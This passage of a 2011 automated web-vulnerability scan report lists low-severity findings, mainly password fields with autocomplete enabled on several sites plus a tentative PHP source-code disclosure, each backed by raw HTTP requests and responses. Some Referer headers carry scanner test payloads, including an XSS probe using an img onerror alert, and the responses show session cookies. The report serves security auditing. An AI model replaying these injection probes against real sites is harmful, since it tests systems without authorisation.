<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.42. http://www.polls.newsvine.com/_nv/cms/info/jobs

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/jobs

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/info/jobs HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:51 GMT
Content-Length: 22585
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.43. http://www.polls.newsvine.com/_nv/cms/info/privacyPolicy

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/privacyPolicy

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/info/privacyPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:53 GMT
Content-Length: 32656
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.44. http://www.polls.newsvine.com/_nv/cms/info/userAgreement

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/userAgreement

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/info/userAgreement HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:16:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.45. http://www.polls.newsvine.com/_nv/cms/welcome

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/welcome

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_nv/cms/welcome HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:32 GMT
Content-Length: 16514
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.46. http://www.polls.newsvine.com/_vine/a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/a

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /_vine/a HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre35aee%3Cimg%20src%3da%20onerror%3dalert(1)%3E16f5f70bd5e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:36:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
       <form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
           <input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.47. http://www.polls.newsvine.com/_vine/js/m1/vine.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/js/m1/vine.js

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /_vine/js/m1/vine.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://polls.newsvine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-360; jt_time=1296350654008; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 26 Mar 2010 01:03:28 GMT
ETag: "1258584-113ed-482a9bb29b800"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=470797
Expires: Sat, 05 Feb 2011 01:54:30 GMT
Date: Sun, 30 Jan 2011 15:07:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 70637


// set global defaults
var pokeURL = typeof(globalPokeURL) != 'undefined' ? globalPokeURL : 'http://log.newsvine.com/poke.gif';
var imgRoot = typeof(globalImgRoot) != 'undefined' ? globalImgRoot : 'h
...[SNIP]...
</h3><form method="post" action="'+loginRoot+'">';
   iHTML += '<input type="hidden" name="redirect" value="'+vine.session.webRoot+'/_nv/accounts/login" />
...[SNIP]...
<div>Password: <input type="password" name="password" style="width: 130px; margin-bottom: 5px" /></div>
...[SNIP]...

18.48. http://www.scientificamerican.com/blog/observations/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /blog/observations/

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
</h3>
       <form id="login" action="http://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser" class="asyncForm">
           <fieldset>
...[SNIP]...
<label for="password">
                   Password
                   <input type="password" id="password" value="" name="password" />
               </label>
...[SNIP]...

18.49. http://www.scientificamerican.com/errors/404.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /errors/404.cfm

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /errors/404.cfm HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 404 Page not found
Server: Apache
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 57499
Date: Sun, 30 Jan 2011 17:14:49 GMT
X-Varnish: 1916371499
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Page not found--/errors/404.cfm? : Scientific American</title>
   <meta charset="utf-8" />
   <meta name="description" conte
...[SNIP]...
</h3>
       <form id="login" action="https://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser" class="asyncForm">
           <fieldset>
...[SNIP]...
<label for="password">
                   Password
                   <input type="password" id="password" value="" name="password" />
               </label>
...[SNIP]...

18.50. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.six-telekurs.com
Path:   /tkfich_index/tkfich_home.htm

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /tkfich_index/tkfich_home.htm HTTP/1.1
Host: www.six-telekurs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8
Content-Type: text/html
Last-Modified: Sun, 30 Jan 2011 02:03:20 GMT
ETag: "74935320-01010000"
Expires: Sun, 30 Jan 2011 01:03:20 GMT
Cache-Control: no-cache
Content-Length: 26752
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.six
...[SNIP]...
<table cellspacing="0" cellpadding="0" border="0" align="center" width="100%">
   <FORM name="myform" method="post" target="_top" onSubmit="Speichern(); return OnSubmitForm();">
   <INPUT TYPE="HIDDEN" Name="FD_AUTH">
...[SNIP]...
<td class="stytextindex" valign="top" style="padding-left:3px"><INPUT TYPE="PASSWORD" NAME="password" size="9" VALUE="" MAXLENGTH="16" class="stytextindex"><img src="spacer.gif" width="1" height="16">
...[SNIP]...

18.51. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:03:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...
<div id="sign-in">
<form method="post" action="http://circle.stylemepretty.com/wp-login.php">
<input type="submit" value="Log In" id="log-in" name="wp-submit" />
...[SNIP]...
<input type="text" name="log" id="sign-in-username" />
<input type="password" name="pwd" id="sign-in-password" />
<input type="submit" value="Go" id="sign-in-btn" />
...[SNIP]...

18.52. http://www.unmannedspaceflight.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.unmannedspaceflight.com
Path:   /

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.unmannedspaceflight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:13:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
X-Powered-By: PHP/5.2.5
Set-Cookie: session_id=fca5e4b9dbd2693a2f3fe33702719089; path=/; httponly
Connection: close
Content-Type: text/html
Content-Length: 87175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">
       
           <form action="http://www.unmannedspaceflight.com/index.php?s=fca5e4b9dbd2693a2f3fe33702719089&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="focus_username(this)" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="focus_password(this)" value="------" />
               <input class="button" type="image" src="style_images/ip.boardpr/login-button.gif" />
...[SNIP]...

18.53. http://www.unmannedspaceflight.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.unmannedspaceflight.com
Path:   /

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.unmannedspaceflight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
X-Powered-By: PHP/5.2.5
Set-Cookie: session_id=47217f8154e2e2ad81f66ad14c4bf133; path=/; httponly
Connection: close
Content-Type: text/html
Content-Length: 87221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">
       
           <form action="http://www.unmannedspaceflight.com/index.php?s=47217f8154e2e2ad81f66ad14c4bf133&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="focus_username(this)" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="focus_password(this)" value="------" />
               <input class="button" type="image" src="style_images/ip.boardpr/login-button.gif" />
...[SNIP]...

18.54. http://www.zacks.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zacks.com
Path:   /

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:12 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=6ssok6pvga1gucejl91shelqj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 02:04:12 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 133254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- DC_PAGE_ID: 1, ADID: -->
<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
</tr>-->
   <form name=jsloginform method="POST" onSubmit="return JSloginCheck();">
   <tr>
...[SNIP]...
<td class="content" width="75" NOWRAP>
           <INPUT type="password" size="10" maxlength="50" name="password" value="" style="width:70px;">
       </TD>
...[SNIP]...

19. Source code disclosure
There are 5 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


19.1. http://fitbie.redacted/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://fitbie.redacted
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: fitbie.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sat, 29 Jan 2011 15:01:40 +0000
ETag: "1296313300-1"
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:17 GMT
Date: Sat, 29 Jan 2011 23:46:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div class="panel-wrap-top clear-block">
<?php// print_r($content);?>
<div class="panel-panel panel-top-left">
...[SNIP]...

19.2. http://oneightyla.vo.llnwd.net/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://oneightyla.vo.llnwd.net
Path:   /o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv HTTP/1.1
Host: oneightyla.vo.llnwd.net
Proxy-Connection: keep-alive
Referer: http://ec.redcated/ds/UXULASONYSEL/BloggieHoliday_HD_PC/Flash_300x250_HD_PC_promo.swf?ver=1&clickTag1=http://clk.redcated/go/296652509/direct;ai.200329627;ct.1/01&clickTag=http://clk.redcated/go/296652509/direct;ai.200329627;ct.1/01
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 521037
X-Permitted-Cross-Domain-Policies: all
Content-Type: text/plain
Age: 112773
Date: Sun, 30 Jan 2011 01:19:49 GMT
Last-Modified: Mon, 22 Nov 2010 09:25:05 GMT
Connection: keep-alive

FLV.....    .................
onMetaData....
..duration.@,.E......width.@d........height.@V.......videodatarate.@i.......    framerate.@=.S......videocodecid.@........audiodatarate.@P.......
audiodelay.?...S.....audiocodecid.@.........canSeekToEnd....    .......l.........    onXMPData.......liveXML..L<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...



.^M.E5..D.U.P...G......WQ..#2e.    Z..l;*(.v*......E.C\........&.."...V?.@n............T".V.A.....h...K..f.YYY..`.'p.2.d.._.,... @.Q..`g..2..p..................P....`.i$.kin ...q...R++...n|.K....n...<!.U.\.....i..Q.].9`.d...U.<....In_O...V..j.h...!I...U.>..)..#7^.....!f...4u....F.<f$5.q<.....
..t...{.=...J.P.;m%..E...O....e..F.l..mW.[.8..d.........T...U..M..$..w....    .._.......$...."/...~....]......(CD...J..#.t{..G.D1.j...i..8..w.....^....Q&..$z.. L..9.ud;-..z....6Rm.W..s.......*..)...d.A..^4..X.W...........XF8..B7.W.DI..T..a..
J........A=.-2M.....S.._.V..g.r_...'"..0..y..C...tO.......-....WZWTL...C......E^...cVy.\X..w|.*M...g..t.d..J .7.....0...W..Y..,.....8..;a&..~x......v.....R....p...4.%.........a.f....h .|{/.Zm....=...........:..Y...M...3.y0O.5..I<P~..'.......,*."-.&.&`vL..Z.'[U.at...~...|...y.x..s....O...f.......FG    {.t3....uZ... ...#..B`A..]..K.Wx..... .K8...>......v!...^..E.3}W%.j.H.OM.s>1..9.l..f...V..#....C.....S.F....m]4<.X2....N.(.t......!.O$..0#.)....q_..o.....j..............P......k..k...m0.u.{<.&s...3=.2v..s....X.    ....BD}.9q.-.v\.*......4 X.7]..|........7h;/..#.T5.
